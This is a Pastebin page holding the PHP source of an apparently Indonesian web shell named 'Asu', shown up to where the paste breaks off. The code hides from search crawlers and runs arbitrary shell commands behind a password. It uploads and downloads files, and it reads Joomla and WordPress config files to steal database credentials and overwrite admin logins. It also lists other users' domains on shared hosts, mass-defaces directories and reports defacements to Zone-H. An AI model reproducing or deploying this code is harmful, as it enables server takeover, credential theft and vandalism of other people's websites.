Guest User

ASU

a guest
Nov 11th, 2017
377
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 35.65 KB | None | 0 0
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "0c19bc573d6115af5ab19fd6e6f3b287"; // default: goblogasu
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21. header('HTTP/1.0 404 Not Found');
  22. exit;
  23. }
  24. }
  25.  
  26. function login_shell() {
  27. ?>
  28. <html>
  29. <head>
  30. <title>Asu</title>
  31. <style type="text/css">
  32. html {
  33. margin: 20px auto;
  34. background: #000000;
  35. color: green;
  36. text-align: center;
  37. }
  38. header {
  39. color: green;
  40. margin: 10px auto;
  41. }
  42. input[type=password] {
  43. width: 250px;
  44. height: 25px;
  45. color: red;
  46. background: #000000;
  47. border: 1px purple;
  48. padding: 5px;
  49. margin-left: 20px;
  50. text-align: center;
  51. }
  52. input[type=password1] {
  53. width: 250px;
  54. height: 25px;
  55. color: red;
  56. background: #000000;
  57. border: 1px ;
  58. padding: 5px;
  59. margin-left: 20px;
  60. text-align: center;
  61. }
  62. </style>
  63. </head>
  64. <center>
  65. <header>
  66. <html>
  67.  
  68.  
  69. <head>
  70. <link href='http://fonts.googleapis.com/css?family=Give+You+Glory' rel='stylesheet' type='text/css'>
  71. <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
  72. <meta content='Asu' name='description'/>
  73. <meta content='Asu' name='keywords'/>
  74. <meta content='Asu' name='Abstract'/>
  75. <style>
  76. img{border-width:0px}
  77. .shakeimage{position:relative}
  78. .button{margin-top:50px; padding:10px; background-color:red; color:#FFF;}
  79. h1 { font-size:48; margin-top:-20px;}
  80. </style>
  81.  
  82. <title> [!] Asu [!] </title>
  83. <link rel="SHORTCUT ICON" href="http://www.paper-machinery.com/flags/Indonesia.gif">
  84. </head>
  85. <body bgcolor="#000000"><br><center><img src="https://s18.postimg.org/xwfux1m6v/Logo_T9.png" height="350" width="350"></center>
  86. <p></p><p></p><br><br><br><br><form method="post">
  87. <input type="password1" name="passssssssss">
  88. </form>
  89. <center><font color="white" face="Asu" size="3"><b>Asu</b></font>
  90. </body>
  91.  
  92. <form method="post">
  93. <input type="password" name="pass">
  94. </form>
  95. <?php
  96. exit;
  97. }
  98. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  99. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  100. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  101. else
  102. login_shell();
  103. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  104. @ob_clean();
  105. $file = $_GET['file'];
  106. header('Content-Description: File Transfer');
  107. header('Content-Type: application/octet-stream');
  108. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  109. header('Expires: 0');
  110. header('Cache-Control: must-revalidate');
  111. header('Pragma: public');
  112. header('Content-Length: ' . filesize($file));
  113. readfile($file);
  114. exit;
  115. }
  116. ?>
  117. <html>
  118. <head>
  119. <title>Asu</title>
  120. <meta name='author' content='BAHARI TROUBLE MAKER'>
  121. <meta charset="UTF-8">
  122. <style type='text/css'>
  123. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  124. html {
  125. min-height: 100%;
  126. background-color: black;
  127. background-repeat: no-repeat;
  128. background-attachment: fixed;
  129. background-position: center;
  130. background-size: cover;
  131. color: white;
  132. font-family: 'Ubuntu';
  133. font-size: 13px;
  134. width: 100%;
  135. padding: 0px;
  136. -moz-border-radius: 5px;
  137. -webkit-border-radius: 5px;
  138. border-radius: 5px;
  139. }
  140. li {
  141. display: inline;
  142. margin: 5px;
  143. padding: 5px;
  144. -moz-border-radius: 5px;
  145. -webkit-border-radius: 5px;
  146. border-radius: 5px;
  147. }
  148. table, th, td {
  149. border-collapse:collapse;
  150. font-family: Tahoma, Geneva, sans-serif;
  151. background: transparent;
  152. font-family: 'Ubuntu';
  153. font-size: 13px;
  154. -moz-border-radius: 5px;
  155. -webkit-border-radius: 5px;
  156. border-radius: 5px;
  157. }
  158. .table_home, .th_home, .td_home {
  159. border: 1px solid #ffffff;
  160. -moz-border-radius: 5px;
  161. -webkit-border-radius: 5px;
  162. border-radius: 5px;
  163. }
  164. th {
  165. padding: 10px;
  166. }
  167. a {
  168. color: #ffffff;
  169. text-decoration: none;
  170. }
  171. b {
  172. padding: 1px;
  173. border: 1px solid white;
  174. color: green;
  175. text-decoration:
  176. none;color: white;
  177. font-size:14px;
  178. }
  179. a:hover {
  180. color: purple;
  181. text-decoration: underline;
  182. }
  183. tr:hover {
  184. background: #444;
  185. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  186. color: #FFFFFF; TEXT-DECORATION: none;
  187. }
  188.  
  189. input[type=text], input[type=password],input[type=submit] {
  190. background: transparent;
  191. overflow: hidden;
  192. color: #ffffff;
  193. border: 1px solid #ffffff;
  194. margin: 5px auto;
  195. padding-left: 5px;
  196. font-family: 'Ubuntu';
  197. font-size: 13px;
  198. -moz-border-radius: 5px;
  199. -webkit-border-radius: 5px;
  200. border-radius: 5px;
  201. }
  202. textarea {
  203. overflow: hidden;
  204. border: 1px solid #ffffff;
  205. width: 100%;
  206. height: 400px;
  207. padding-left: 5px;
  208. margin: 10px auto;
  209. resize: none;
  210. background: transparent;
  211. color: #ffffff;
  212. font-family: 'Ubuntu';
  213. font-size: 13px;
  214. -moz-border-radius: 5px;
  215. -webkit-border-radius: 5px;
  216. border-radius: 5px;
  217. }
  218. a:focus, input:focus, textarea:focus {
  219. outline: 0;
  220. border-color: rgba(82, 168, 236, 0.8);
  221. -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  222. -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  223. box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  224.  
  225. select {
  226. width: 152px;
  227. background: #000000;
  228. color: lime;
  229. border: 1px solid #ffffff;
  230. margin: 5px auto;
  231. padding-left: 5px;
  232. font-family: 'Ubuntu';
  233. font-size: 13px;
  234. -moz-border-radius: 5px;
  235. -webkit-border-radius: 5px;
  236. border-radius: 5px;
  237. }
  238. option:hover {
  239. background: lime;
  240. color: #000000;
  241. }
  242.  
  243. </style>
  244. </head>
  245. <?php
  246. function w($dir,$perm) {
  247. if(!is_writable($dir)) {
  248. return "<font color=red>".$perm."</font>";
  249. } else {
  250. return "<font color=lime>".$perm."</font>";
  251. }
  252. }
  253. function r($dir,$perm) {
  254. if(!is_readable($dir)) {
  255. return "<font color=red>".$perm."</font>";
  256. } else {
  257. return "<font color=lime>".$perm."</font>";
  258. }
  259. }
  260. function exe($cmd) {
  261. if(function_exists('system')) {
  262. @ob_start();
  263. @system($cmd);
  264. $buff = @ob_get_contents();
  265. @ob_end_clean();
  266. return $buff;
  267. } elseif(function_exists('exec')) {
  268. @exec($cmd,$results);
  269. $buff = "";
  270. foreach($results as $result) {
  271. $buff .= $result;
  272. } return $buff;
  273. } elseif(function_exists('passthru')) {
  274. @ob_start();
  275. @passthru($cmd);
  276. $buff = @ob_get_contents();
  277. @ob_end_clean();
  278. return $buff;
  279. } elseif(function_exists('shell_exec')) {
  280. $buff = @shell_exec($cmd);
  281. return $buff;
  282. }
  283. }
  284. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  285. $ar0=explode($marqueurDebutLien, $text);
  286. $ar1=explode($marqueurFinLien, $ar0[$i]);
  287. return trim($ar1[0]);
  288. }
  289. function perms($file){
  290. $perms = fileperms($file);
  291. if (($perms & 0xC000) == 0xC000) {
  292. // Socket
  293. $info = 's';
  294. } elseif (($perms & 0xA000) == 0xA000) {
  295. // Symbolic Link
  296. $info = 'l';
  297. } elseif (($perms & 0x8000) == 0x8000) {
  298. // Regular
  299. $info = '-';
  300. } elseif (($perms & 0x6000) == 0x6000) {
  301. // Block special
  302. $info = 'b';
  303. } elseif (($perms & 0x4000) == 0x4000) {
  304. // Directory
  305. $info = 'd';
  306. } elseif (($perms & 0x2000) == 0x2000) {
  307. // Character special
  308. $info = 'c';
  309. } elseif (($perms & 0x1000) == 0x1000) {
  310. // FIFO pipe
  311. $info = 'p';
  312. } else {
  313. // Unknown
  314. $info = 'u';
  315. }
  316. // Owner
  317. $info .= (($perms & 0x0100) ? 'r' : '-');
  318. $info .= (($perms & 0x0080) ? 'w' : '-');
  319. $info .= (($perms & 0x0040) ?
  320. (($perms & 0x0800) ? 's' : 'x' ) :
  321. (($perms & 0x0800) ? 'S' : '-'));
  322. // Group
  323. $info .= (($perms & 0x0020) ? 'r' : '-');
  324. $info .= (($perms & 0x0010) ? 'w' : '-');
  325. $info .= (($perms & 0x0008) ?
  326. (($perms & 0x0400) ? 's' : 'x' ) :
  327. (($perms & 0x0400) ? 'S' : '-'));
  328. // World
  329. $info .= (($perms & 0x0004) ? 'r' : '-');
  330. $info .= (($perms & 0x0002) ? 'w' : '-');
  331. $info .= (($perms & 0x0001) ?
  332. (($perms & 0x0200) ? 't' : 'x' ) :
  333. (($perms & 0x0200) ? 'T' : '-'));
  334. return $info;
  335. }
  336. function hdd($s) {
  337. if($s >= 1073741824)
  338. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  339. elseif($s >= 1048576)
  340. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  341. elseif($s >= 1024)
  342. return sprintf('%1.2f',$s / 1024 ) .' KB';
  343. else
  344. return $s .' B';
  345. }
  346. function ambilKata($param, $kata1, $kata2){
  347. if(strpos($param, $kata1) === FALSE) return FALSE;
  348. if(strpos($param, $kata2) === FALSE) return FALSE;
  349. $start = strpos($param, $kata1) + strlen($kata1);
  350. $end = strpos($param, $kata2, $start);
  351. $return = substr($param, $start, $end - $start);
  352. return $return;
  353. }
  354. function getsource($url) {
  355. $curl = curl_init($url);
  356. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  357. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  358. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  359. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  360. $content = curl_exec($curl);
  361. curl_close($curl);
  362. return $content;
  363. }
  364. function bing($dork) {
  365. $npage = 1;
  366. $npages = 30000;
  367. $allLinks = array();
  368. $lll = array();
  369. while($npage <= $npages) {
  370. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  371. if($x) {
  372. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  373. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  374. $npage = $npage + 10;
  375. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  376. } else break;
  377. }
  378. $URLs = array();
  379. foreach($allLinks as $url){
  380. $exp = explode("/", $url);
  381. $URLs[] = $exp[2];
  382. }
  383. $array = array_filter($URLs);
  384. $array = array_unique($array);
  385. $sss = count(array_unique($array));
  386. foreach($array as $domain) {
  387. echo $domain."\n";
  388. }
  389. }
  390. function reverse($url) {
  391. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  392. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  393. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  394. curl_setopt($ch, CURLOPT_HEADER, 0);
  395. curl_setopt($ch, CURLOPT_POST, 1);
  396. $resp = curl_exec($ch);
  397. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  398. $array = explode(",,", $resp);
  399. unset($array[0]);
  400. foreach($array as $lnk) {
  401. $lnk = "http://$lnk";
  402. $lnk = str_replace(",", "", $lnk);
  403. echo $lnk."\n";
  404. ob_flush();
  405. flush();
  406. }
  407. curl_close($ch);
  408. }
  409. if(get_magic_quotes_gpc()) {
  410. function idx_ss($array) {
  411. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  412. }
  413. $_POST = idx_ss($_POST);
  414. $_COOKIE = idx_ss($_COOKIE);
  415. }
  416.  
  417. if(isset($_GET['dir'])) {
  418. $dir = $_GET['dir'];
  419. chdir($dir);
  420. } else {
  421. $dir = getcwd();
  422. }
  423. $kernel = php_uname();
  424. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  425. $dir = str_replace("\\","/",$dir);
  426. $scdir = explode("/", $dir);
  427. $freespace = hdd(disk_free_space("/"));
  428. $total = hdd(disk_total_space("/"));
  429. $used = $total - $freespace;
  430. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  431. $ds = @ini_get("disable_functions");
  432. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>MYSQL</font>" : "<font color=red>MYSQL</font>";
  433. $curl = (function_exists('curl_version')) ? "<font color=lime>CURL</font>" : "<font color=red>CURL</font>";
  434. $wget = (exe('wget --help')) ? "<font color=lime>WGET</font>" : "<font color=red>WGET</font>";
  435. $perl = (exe('perl --help')) ? "<font color=lime>PERL</font>" : "<font color=red>PERL</font>";
  436. $python = (exe('python --help')) ? "<font color=lime>PYTHON</font>" : "<font color=red>PYTHON</font>";
  437. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  438. if(!function_exists('posix_getegid')) {
  439. $user = @get_current_user();
  440. $uid = @getmyuid();
  441. $gid = @getmygid();
  442. $group = "?";
  443. } else {
  444. $uid = @posix_getpwuid(posix_geteuid());
  445. $gid = @posix_getgrgid(posix_getegid());
  446. $user = $uid['name'];
  447. $uid = $uid['uid'];
  448. $group = $gid['name'];
  449. $gid = $gid['gid'];
  450. }
  451. echo "<font color=lime>".$kernel."</font><br>";
  452. echo "<font color=lime>".$user."</font> (".$uid.")-<font color=lime>".$group."</font> (".$gid.")| <font color=lime>".$ip."</font><br>";
  453. echo "<font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
  454. echo "<font color=lime>Safe Mode: $sm</font><br>";
  455. echo "<font color=lime>Disable Functions</font>: $show_ds<br>";
  456. echo "| $mysql | $perl| $python | $wget | $curl |<br>";
  457. echo "Current DIR: ";
  458. foreach($scdir as $c_dir => $cdir) {
  459. echo "<a href='?dir=";
  460. for($i = 0; $i <= $c_dir; $i++) {
  461. echo $scdir[$i];
  462. if($i != $c_dir) {
  463. echo "/";
  464. }
  465. }
  466. echo "'>$cdir</a>/";
  467. }
  468. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  469. echo "<hr>";
  470. echo "<center>";
  471. echo "<ul>";
  472. echo "<li> <a href='?'>Home</a> </li>";
  473. echo "<li> <a href='?dir=$dir&do=upload'>Upload</a> </li>";
  474. echo "<li> <a href='?dir=$dir&do=mass_deface'>Mass Deface and Zone-H</a> </li>";
  475. echo "<li> <a href='?dir=$dir&do=salto'>Domene</a> </li>";
  476. echo "<li> <a href='?dir=$dir&do=saltokuy'>Usere</a> </li>";
  477. echo "<li> <a style='color: red;' href='?logout=true'>Metu</a> </li>";
  478. echo "</ul>";
  479. echo "</center>";
  480. echo "<hr>";
  481. if($_GET['logout'] == true) {
  482. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  483. echo "<script>window.location='?';</script>";
  484.  
  485. }
  486. elseif($_GET['do'] == 'saltokuy') {
  487. if(isset($_POST['usernya'])) {
  488. $userr = $_POST['usernya'];
  489. echo "<center><br><form method='post' target='_blank' action='?dir=/home/$userr/backupwordpress'>
  490. <input type='submit' name='g' value='Saltoin' >
  491. </form>";
  492. } else {
  493. echo'<center><br><form method="post">
  494. <input type="text" name="usernya" size="50" height="10" placeholder="usernya" style="margin: 5px auto; padding-left: 5px;" required><br>
  495. <input type="submit" name="gg" value="Anuin" ></form>';
  496. }
  497.  
  498.  
  499. echo "<form method='post'>
  500. <input type='text' size='30' height='10' name='cmd' value='tar -zxvf '><input type='submit' name='do_cmd' value='X'>
  501. </form>";
  502. if($_POST['do_cmd']) {
  503. echo "<textarea name='script' style='width: 450px; height: 200px;'>".exe($_POST['cmd'])."</textarea>";
  504. }
  505. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  506. if($_POST['hajar']) {
  507. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  508. echo "username atau password harus lebih dari 6 karakter";
  509. } else {
  510. $user_baru = $_POST['user_baru'];
  511. $pass_baru = md5($_POST['pass_baru']);
  512. $conf = $_POST['config_dir'];
  513. $scan_conf = scandir($conf);
  514. foreach($scan_conf as $file_conf) {
  515. if(!is_file("$conf/$file_conf")) continue;
  516. $config = file_get_contents("$conf/$file_conf");
  517. if(preg_match("/JConfig|joomla/",$config)) {
  518. $dbhost = ambilkata($config,"host = '","'");
  519. $dbuser = ambilkata($config,"user = '","'");
  520. $dbpass = ambilkata($config,"password = '","'");
  521. $dbname = ambilkata($config,"db = '","'");
  522. $dbprefix = ambilkata($config,"dbprefix = '","'");
  523. $prefix = $dbprefix."users";
  524. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  525. $db = mysql_select_db($dbname);
  526. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  527. $result = mysql_fetch_array($q);
  528. $id = $result['id'];
  529. $site = ambilkata($config,"sitename = '","'");
  530. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  531. echo "Config => ".$file_conf."<br>";
  532. echo "CMS => Joomla<br>";
  533. if($site == '') {
  534. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  535. } else {
  536. echo "Sitename => $site<br>";
  537. }
  538. if(!$update OR !$conn OR !$db) {
  539. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  540. } else {
  541. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  542. }
  543. mysql_close($conn);
  544. } elseif(preg_match("/WordPress/",$config)) {
  545. $dbhost = ambilkata($config,"DB_HOST', '","'");
  546. $dbuser = ambilkata($config,"DB_USER', '","'");
  547. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  548. $dbname = ambilkata($config,"DB_NAME', '","'");
  549. $dbprefix = ambilkata($config,"table_prefix = '","'");
  550. $prefix = $dbprefix."users";
  551. $option = $dbprefix."options";
  552. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  553. $db = mysql_select_db($dbname);
  554. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  555. $result = mysql_fetch_array($q);
  556. $id = $result[ID];
  557. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  558. $result2 = mysql_fetch_array($q2);
  559. $target = $result2[option_value];
  560. if($target == '') {
  561. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  562. } else {
  563. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  564. }
  565. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  566. echo "Config => ".$file_conf."<br>";
  567. echo "CMS => Wordpress<br>";
  568. echo $url_target;
  569. if(!$update OR !$conn OR !$db) {
  570. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  571. } else {
  572. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  573. }
  574. mysql_close($conn);
  575. }
  576. }
  577. }
  578. } else {
  579. echo "
  580.  
  581. <form method='post' target='_blank'>
  582. <input type='text' size='70' name='config_dir' value='$dir'><br>
  583. <input type='text' name='user_baru' value='bacotgoblok' placeholder='user_baru'><br>
  584. <input type='text' name='pass_baru' value='bacotgoblok' placeholder='pass_baru'><br>
  585. <input type='submit' name='hajar' value='Sikat' style='width: 215px;'>
  586. </form>
  587. ";
  588.  
  589.  
  590. echo "<center>";
  591. echo "<table align='center'><tr><th> USER </table></th></tr>";
  592. echo "<textarea name='script' style='width: 450px; height: 200px;'>";
  593. $domains = scandir("/var/named");
  594. $count=1;
  595. $dc = 0;
  596. $list = scandir("/var/named");
  597. foreach($list as $domain){
  598. if(strpos($domain,".db")){
  599. $domain = str_replace('.db','',$domain);
  600. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  601. $dirz = '/home/'.$owner['name'].'/backupwordpress';
  602.  
  603. if (is_readable($dirz)) {
  604. echo "".$owner['name']."\n";
  605. $dc++;
  606. }
  607.  
  608. }
  609. }
  610. echo"</textarea>";
  611. $total = $dc;
  612. echo '<br><div class="result">Total Anu Found = '.$total.'</h3><br />';
  613. echo '</center>';
  614. }
  615. }
  616. elseif($_GET['do'] == 'salto') {
  617. $all = array();
  618. // domain finder.
  619. $d0mains = file('/etc/named.conf');
  620. $domains = scandir("/var/named");
  621.  
  622. if($domains or $d0mains){
  623. $count = 0;
  624. if($domains){
  625. echo "<center><h1>Count Domains on user</h1></center><br><br>";
  626. $cur = array();
  627. foreach($domains as $domain){
  628. if(strpos($domain, '.db')){
  629. $dom = str_replace('.db', '', $domain);
  630. $own = posix_getpwuid(fileowner("/etc/valiases/$dom"));
  631. $user = $own['name'];
  632. $all[$user][] = $dom;
  633. //echo "$user: $dom<br/>";
  634. }
  635. }
  636. echo "";
  637. }
  638. elseif($d0mains){
  639.  
  640. $mck = array();
  641. foreach($d0mains as $domain){
  642. preg_match_all('#zone "(.*)"#',$domain,$dom);
  643. flush();
  644. if(strlen(trim($domain[1][0])) >2){
  645. $mck[] = $dom[1][0];
  646. }
  647. }
  648.  
  649. $mck = array_unique($mck);
  650. foreach($mck as $dom){
  651. $own = posix_getpwuid(fileowner("/etc/valiases/$dom"));
  652. $user = $own['name'];
  653. $all[$user][] = $dom;
  654. //echo "$user: $dom<br/>";
  655. }
  656. echo "";
  657. }
  658. }
  659. foreach($all as $user => $domain){
  660. echo "<center>User <font color='red'>$user</font> has <font color='red'>".count($domain)."</font> Domains below :<br></center>";
  661. echo "<center>---------------<br>";
  662. foreach($domain as $v){
  663. echo "<center><a href='http://$v/' target='_blank'>http://$v<a><br></center>";
  664. }
  665. echo "<center>---------------";
  666. echo "<br><br>";
  667. }
  668.  
  669. }
  670.  
  671. elseif($_GET['do'] == 'upload') {
  672. echo "<center>";
  673. if($_POST['upload']) {
  674. if($_POST['tipe_upload'] == 'biasa') {
  675. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  676. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  677. } else {
  678. $act = "<font color=red>failed to upload file</font>";
  679. }
  680. } else {
  681. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  682. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  683. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  684. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  685. $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  686. } else {
  687. $act = "<font color=red>failed to upload file</font>";
  688. }
  689. } else {
  690. $act = "<font color=red>failed to upload file</font>";
  691. }
  692. }
  693. }
  694. echo "Upload File:
  695. <form method='post' enctype='multipart/form-data'>
  696. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  697. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  698. <input type='file' name='ix_file'>
  699. <input type='submit' value='upload' name='upload'>
  700. </form>";
  701. echo $act;
  702. echo "</center>";
  703. } elseif($_GET['do'] == 'cmd') {
  704. echo "<form method='post'>
  705. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
  706. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  707. </form>";
  708. if($_POST['do_cmd']) {
  709. echo "<pre>".exe($_POST['cmd'])."</pre>";
  710. }
  711. } elseif($_GET['do'] == 'mass_deface') {
  712. function sabun_massal($dir,$namafile,$isi_script) {
  713. if(is_writable($dir)) {
  714. $dira = scandir($dir);
  715. foreach($dira as $dirb) {
  716. $dirc = "$dir/$dirb";
  717. $lokasi = $dirc.'/'.$namafile;
  718. if($dirb === '.') {
  719. file_put_contents($lokasi, $isi_script);
  720. } elseif($dirb === '..') {
  721. file_put_contents($lokasi, $isi_script);
  722. } else {
  723. if(is_dir($dirc)) {
  724. if(is_writable($dirc)) {
  725. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  726. file_put_contents($lokasi, $isi_script);
  727. $idx = sabun_massal($dirc,$namafile,$isi_script);
  728. }
  729. }
  730. }
  731. }
  732. }
  733. }
  734. function sabun_biasa($dir,$namafile,$isi_script) {
  735. if(is_writable($dir)) {
  736. $dira = scandir($dir);
  737. foreach($dira as $dirb) {
  738. $dirc = "$dir/$dirb";
  739. $lokasi = $dirc.'/'.$namafile;
  740. if($dirb === '.') {
  741. file_put_contents($lokasi, $isi_script);
  742. } elseif($dirb === '..') {
  743. file_put_contents($lokasi, $isi_script);
  744. } else {
  745. if(is_dir($dirc)) {
  746. if(is_writable($dirc)) {
  747. echo "<td><a href='http://$dirb/$namafile' target='_blank'><font color=red>http://$dirb/$namafile</a></font><br>";
  748. file_put_contents($lokasi, $isi_script);
  749. }
  750. }
  751. }
  752. }
  753. }
  754. }
  755. if($_POST['start']) {
  756. if($_POST['tipe_sabun'] == 'mahal') {
  757. echo "<div style='margin: 5px auto; padding: 5px'>";
  758. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  759. echo "</div>";
  760. } elseif($_POST['tipe_sabun'] == 'murah') {
  761. echo "<div style='margin: 5px auto; padding: 5px'>";
  762. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  763. echo "</div>";
  764. }
  765. } else {
  766. echo "<center>";
  767. echo "<form method='post'>
  768. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  769. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  770. <font style='text-decoration: underline;'>Folder:</font><br>
  771. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  772. <font style='text-decoration: underline;'>Filename:</font><br>
  773. <input type='text' name='d_file' value='vx.php' style='width: 450px;' height='10'><br>
  774. <font style='text-decoration: underline;'>Index File:</font><br>
  775. <textarea name='script' style='width: 450px; height: 200px;'><title>-{ Hacked By ./cOLI}-</title></textarea><br>
  776. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  777. </form></center>";
  778. }
  779. if($_POST['submit']) {
  780. $domain = explode("\r\n", $_POST['url']);
  781. $nick = $_POST['nick'];
  782. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  783. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  784. function zoneh($url,$nick) {
  785. $ch = curl_init("http://www.zone-h.com/notify/single");
  786. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  787. curl_setopt($ch, CURLOPT_POST, true);
  788. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  789. return curl_exec($ch);
  790. curl_close($ch);
  791. }
  792. foreach($domain as $url) {
  793. $zoneh = zoneh($url,$nick);
  794. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  795. echo "$url -> <font color=lime>OK</font><br>";
  796. } else {
  797. echo "$url -> <font color=red>ERROR</font><br>";
  798. }
  799. }
  800. } else {
  801. echo "<center><form method='post'>
  802. <font style='text-decoration: underline;'>Zone-H Poster :</font><br>
  803. <u>Defacer</u>: <br>
  804. <input type='text' name='nick' size='50' value='./cOLI'><br>
  805. <u>Domains</u>: <br>
  806. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  807. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  808. </form>";
  809. }
  810. echo "</center>";
  811. } elseif($_GET['act'] == 'newfile') {
  812. if($_POST['new_save_file']) {
  813. $newfile = htmlspecialchars($_POST['newfile']);
  814. $fopen = fopen($newfile, "a+");
  815. if($fopen) {
  816. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  817. } else {
  818. $act = "<font color=red>permission denied</font>";
  819. }
  820. }
  821. echo $act;
  822. echo "<form method='post'>
